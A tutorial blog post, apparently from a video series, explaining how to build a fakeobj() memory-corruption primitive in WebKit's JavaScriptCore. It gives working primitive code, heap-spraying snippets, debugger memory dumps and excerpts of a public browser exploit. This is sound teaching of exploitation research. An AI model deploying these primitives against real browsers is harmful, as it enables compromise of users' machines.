The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption

TLDR
In this video we introduce the fakeobj() primitive. It's based on the bug used in addrof() and allows us to corrupt the memory of internal JavaScriptCore objects

Series

watch on YouTube

Introduction

From the last blog post we've seen how we can leak the address of a JavaScript object; now it's time for us to see if we could achieve a memory corruption. Before jumping into the code, it's crucial that you have a basic understanding of how a JavaScript object looks like in memory (with inline properties and the butterfly) because, in this post we will use this knowledge to turn a memory leak into a memory corruption.

You might wonder how can we turn this memory leak into something that allows us to compromise the JavaScript engine. Well, it's a not as easy as a simple buffer overflow where you get to control the instruction pointer directly. The bug we have here gives us some capabilities, but we need to do more to turn it into something powerful.

'fakeobj' Primitive

In saelo's article, he talks about two primitives - addrof and fakeobj. We've already used addrof to leak the address of an object in memory, so now let's look at the fakeobj one.

The fakeobj primitive works essentially the other way around.  Here we inject native doubles into an array of JSValues, allowing us to create JSObject pointers.

Remember from this post, the JSValues are stored 32-bit integers with this format where the highest bytes were  FFFF like shown below.

Pointer {  0000:PPPP:PPPP:PPPP
         / 0001:****:****:****
Double  {         ...
         \ FFFE:****:****:****
Integer {  FFFF:0000:IIII:IIII

This is precisely how we found them in memory, however when you add a JavaScript object into an array, then you store a pointer, which is the address to that object. So if addrof primitive uses this idea to read the pointer to an object as a double, can we also reverse this so that a double is interpreted as the pointer to an object? Well, that's precisely what we are going to do now.

Let's copy the addrof code and start modifying it.

// 
// fakeobj primitive
// Numbers in the comments represent the points listed below the code.

function fakeobj(dbl) { // (1) & (2)
  var array = [13.37];
  var reg = /abc/y;
    
  // Target function
  var AddrSetter = function(array) { // (4)
    "abc".match(reg);
    array[0] = dbl; // (3)
  }
  
  // Force optimization
  for (var i = 0; i < 100000; ++i)
    AddrSetter(array);
  
  // Setup haxx
  regexLastIndex = {};
  regexLastIndex.toString = function() {
    array[0] = {};
    return "0";
  };
  reg.lastIndex = regexLastIndex;
  
  // Do it!
  AddrSetter(array);
  return array[0]; // (5)
}

Here is what changed:

  1. Changed the function name from addrof to fakeobj to match it's primitive.
  2. Changed the name of the argument from val to dbl, which represents double.
  3. Instead of reading and returning the first value of the array as the double, we write to it.
  4. Changed the name of the function from AddrGetter to AddrSetter.
  5. Instead of returning the results of the old AddrGetter, we are just returning the first element of the array.

It all starts with an array with doubles and we JIT the code that's responsible for writing a double of our choice into the first element of that array - nothing special, totally normal. Then we prepare the bug with the toString function and call the AddrSetter function again. This will execute the RegEx, which calls the toString and assigns an object to the first element of the array. Now the JavaScript engine will turn the array with doubles into an array with contiguous and places a pointer to this new object into it. BUT the JIT-ed code still thinks that we have an array with doubles and this will write a double of our choice into the first element, overwriting the old pointer. Now if this double that overwrites the object address looks like a pointer, then JavaScript will think that the first element of the array is pointing to an object. Let's try this.

The Fake Object

Let's try to craft an object, but first, let's run jsc with lldb attached to it and also let's run our JavaScript file in an interactive mode.

$ lldb ./jsc
(lldb) run -i ~/projects/webkit/test.js
Process 64142 launched: './jsc (x86_64)
>>> 

Let's keep this simple and create an object with a single property x which is a simple integer.

>>> test = {}
[object Object]
>>> test.x = 1
1
>>> describe(test)
Object: 0x62d0000d4080 with butterfly 0x0 (Structure 0x62d000188310: [...])
# Hit CTRL + C
(lldb) x/4gx 0x62d0000d4080
0x62d0000d4080: 0x0100160000000126 0x0000000000000000
0x62d0000d4090: 0xffff000000000001 0x0000000000000000

Looking at the object, we see that the 0x0100160000000126 has some flags and the Structure ID, together they are a JSCell Header. Then we have a butterfly which is null (0x0), followed by the inline property x which we set to a 32-bit integer with the value of 1. Now keeping this in mind, let's try to fake such an object.

One of the most clever parts of this exploit is that while faking the objects, we can abuse the fact that the first few properties of the object is inlined and not placed into the butterfly. But let's see first how this object looks like in memory. Notice how the properties 1, 2, 3 show up?

>>> fake = {}
[object Object]
>>> fake.a = 1
1
>>> fake.b = 2
2
>>> fake.c = 3
3
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
# Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0xffff000000000001 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

Now let's just test our primitive. We can use addrof to get the address, and then we use fakeobj on this address. This means hax should now be the same object as fake.

>>> addrof(fake)
5.36780059573753e-310
>>> hax = fakeobj(5.36780059573753e-310)
[object Object]
>>> hax.a
1
>>> hax.b
2
>>> hax.c
3
>>> describe(hax)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...

Cool. We can get the address of the fake object and we can get back the fake object using our fakeobj primitive. But here comes the trick. We fully control the double that is interpreted as a pointer by the JavaScript engine. So what if we add a tiny bit (+0x10) to that double value which is the address of the fake object, so that the pointer is now shifted forward and pointing a bit down into the memory.


If we use the fakeobj function now, JavaScript will think that the new offset is the JavaScript Object, but in our case, it doesn't look like a valid JavaScript object because it's missing the flags, the butterfly and the inline properties. Since we control the inlined properties, we can try to craft a valid Javascript object.

Let's start with the flags and the Structure ID. As you know, the Structure ID defines what kind of properties exists on an object. If we want to fake the test object with the property x from the earlier, we need to use exactly the Structure ID from the test object.

Our test object looks like this

# Flags and Structure ID | Butterfly
0x0100160000000126 0x0000000000000000
0xffff000000000001 0x0000000000000000
# Inline property `x` with the value `1`

So we want to write a fake structure ID that matches the real Structure ID into the first property. But since we don't have a handy function like describe in browsers, how are we suppose to read the Structure ID of the test object at run time? Well, we already know that we can create a new structure and get a new Structure ID every time we add a new property onto the object.  So we can abuse this to spam and then guess a valid Structure ID.

We create a lot of these test objects with the property x but also an arbitrary other property to force new Structure IDs. Basically, we spray test objects.

for (var i=0; i<0x1000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}
2
>>> describe(test)
Object: 0x62d00089d300 with butterfly 0x0 (Structure ...:[Object, {x:0, prop_4095:1} ...])

If we look at the last test object that was created, we see that there is our x property, but also there's this other arbitrary property, but most importantly it has a huge structure ID. So if we randomly pick a Structure ID of let's say 0x1000, we should be very certain that we get one of those test objects. Theoretically, this could also fail, and it could so happen that the Structure ID was not our target test object, but we can really increase our probability by spraying more objects.

So now we want to craft a 64-bit value 0x0100160000000126 which is our special flags and the Structure ID. Since we are going to be writing the double let's convert this 64-bit integer to a double.

>>> # This is python, not the jsc interpreter
>>> import struct
>>> struct.pack("Q", 0x0100160000001000)
b'\x00\x10\x00\x00\x00\x16\x00\x01'
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000))
(7.330283319472755e-304,)

Now this double should be a valid JSCell header for our fake object and we can assign it to the property a.

>>> // this is javascript
>>> fake.a = 7.330283319472755e-304
7.330283319472755e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0101160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

However, as you can see our value is messed up a bit. Carefully compare 0x0100160000001000 with 0x0100160000001000 . There's an additional 1 in 0x0101160000001000 that shouldn't be there. This is due to the NaN-encoding for JSValues.

The scheme we have implemented encodes double precision values by performing a 64-bit integer addition of the value 2^48 to the number.

NaN-encoding for Doubles

So basically the engine will add 0x1000000000000, so we just gotta subtract this value.

>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000-0x1000000000000))
(7.082855106403439e-304,)

Now let's try again.

>>> // this is javascript
>>> fake.a = 7.082855106403439e-304
7.082855106403439e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

Now we have the right value 0x0100160000001000. Next, we have the butterfly, and we want this to be 0, but how can we do that if the JavaScript adding ffff at the beginning? It's very simple; we can set it to some value and just delete the property which will throw away everything and place 0x0.

>>> fake.b = 2
2
>>> delete fake.b
true
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

The third property on our fake object would become the first property on our fake test object, so we can set it to anything we want, how about 1337?

>>> fake.c = 1337
1337
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000539 0x0000000000000000

Now everything looks promising, so let's place all of this into our test.js script.

function fakeobj(dbl) {
    ...
}

for (var i=0; i<0x2000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}

fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b

print(addrof(fake)); // get the address of the fake object

Running this will spit out the usual address of the fake object.

(lldb) run
5.367800960505e-310
>>> x/6gx 0x62d0007de880
0x62d0007de880: 0x010016000000212a 0x0000000000000000
0x62d0007de890: 0x0100160000001000 0x0000000000000000
0x62d0007de8a0: 0xffff000000000539 0x0000000000000000

5.367800960505e-310 is 0x62d0007de880, but we want to shift 16 bytes(0x10) down, so let's use python to do that.

>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x62d0007de880 + 0x10))
(5.3678009605058e-310,)

Now let's try to use the fakeobj function to see if this created a object.

>>> // this is javascript
>>> hax = fakeobj(5.3678009605058e-310)
[object Object]
>>> hax.x
1337 // It works!
>>> describe(hax)
Object: 0x62d0007de890 with butterfly ...

There we go, we have an object at 0x62d0007de890, which means we made jsc think that hax is an object, but those are actually just properties of our fake object. This means that if we change the property on one would affect the other.

>>> hax.x
1337
>>> fake.c = "LiveOverflow"
LiveOverflow
>>> hax.x
LiveOverflow

This might seem a bit useless to you, but imagine the power we have now. We can craft arbitrary JavaScript Objects, and you control their internal class properties down to the memory level. This is not yet a code execution, but the question we should ask ourselves:

What JavaScript object could we fake that increases our capabilities?

At this point we could go about doing some security research and try to find good objects, but since we are noobs and there are other awesome researchers out there who've asked this question and figured ways out, let's just go with them. So let's see what Linus does in his exploit.

Linus's way

  • In pwn.js, he sprays a bunch of Float64Array structures in the same way we did.
var structs = [];
for (var i = 0; i < 0x5000; i++) {
    var a = new Float64Array(1);
    a['prop' + i] = 1337;
    structs.push(a);
}
  • Then he also sprays a few WebAssembly.Memory objects and prepares some web assembly code.
for (var i = 0; i < 50; i++) {
    var a = new WebAssembly.Memory({inital: 0});
    a['prop' + i] = 1337;
    structs.push(a);
}
var webAssemblyCode = '\x00asm\x01\x00\x00\x00\x01\x0b\x02...';
var webAssemblyBuffer = str2ab(webAssemblyCode);
var webAssemblyModule = new WebAssembly.Module(webAssemblyBuffer);
  • He also sets up the JSCell Header using the Int64 from Int64.js library which is created by saleo which we are going to ignore for now. Basically, it'll just create a fake JSCell Value as we did with python.
var jsCellHeader = new Int64([
    0x00, 0x50, 0x00, 0x00, // m_structureID
    0x0,                    // m_indexingType
    0x2c,                   // m_type
    0x08,                   // m_flags
    0x1                     // m_cellState
]);
  • Down below, he creates a new object called wasmBuffer and the first property is the jsCellHeader like the first property a of our fake object. He also creates a butterfly. However, later down the road, he deletes it.
var wasmBuffer = {
    jsCellHeader: jsCellHeader.asJSValue(),
    butterfly: null,
    vector: null,
    memory: null,
    deleteMe: null
};
  • Deletion of the butterfly, because he apparently wants it to be 0.
delete wasmBuffer.butterfly
  • Going down, we see our first addrof, which leaks the address of the wasmBuffer object as a double.
var wasmBufferRawAddr = addrof(wasmBuffer);
  • Now he shifts the entire the pointer 16 bytes down by adding 0x10 to the original just like we did.
var wasmBufferAddr = Add(Int64.fromDouble(wasmBufferRawAddr), 16);
  • After that he uses the library code again to turn the address back to double and then passes it the the fakeobj function.
var fakeWasmBuffer = fakeobj(wasmBufferAddr.asDouble());
  • Now he should get a fake Float64Array. But here's a trick. Remember that he sprayed the Float64Array first and then a bunch of WebAssembly.Memory objects in the first and the second step? Turns out he is not interested in the Float64Array at all.
  • The while loop checks if the fakeWasmBuffer is not an instance of the WebAssembly.Memory object. But how does this make any sense when he deliberately chose a structure ID to get a Float64Array. Well, he abuses the fact that the two objects are overlapped. The fake wasmBuffer overlaps with the original wasmBuffer JSCell header. When we changed the value of the fake object's property fake.c = "LiveOverflow", we saw that it had a direct change on the hax object as well. Here he keeps incrementing the JSCell header of the wasmBuffer which affects the real Structure ID of the fake wasmBuffer.
while (!(fakeWasmBuffer instanceof WebAssembly.Memory)) {
    jsCellHeader.assignAdd(jsCellHeader, Int64.One);
    wasmBuffer.jsCellHeader = jsCellHeader.asJSValue();
}
  • So in each loop, he checks if the fake wasmBuffer has turned into a WebAssembley.Memory object. Basically, he's bruteforcing the Structure IDs in a safe way until he gets the WebAssembley.Memory object. This is the reason why he sprayed many floats first since they are fast and then sprayed a few WebAssembley.Memory. Spraying the floats is much faster to get many Structure IDs so he can be sure to get such a fake object and then WebAssembley.Memory memory structures follow after that.

Of course, this is still not an arbitrary code execution, nor does it even try to explain how we get it, but we will slowly get there. We understood yet another crucial part.

Resources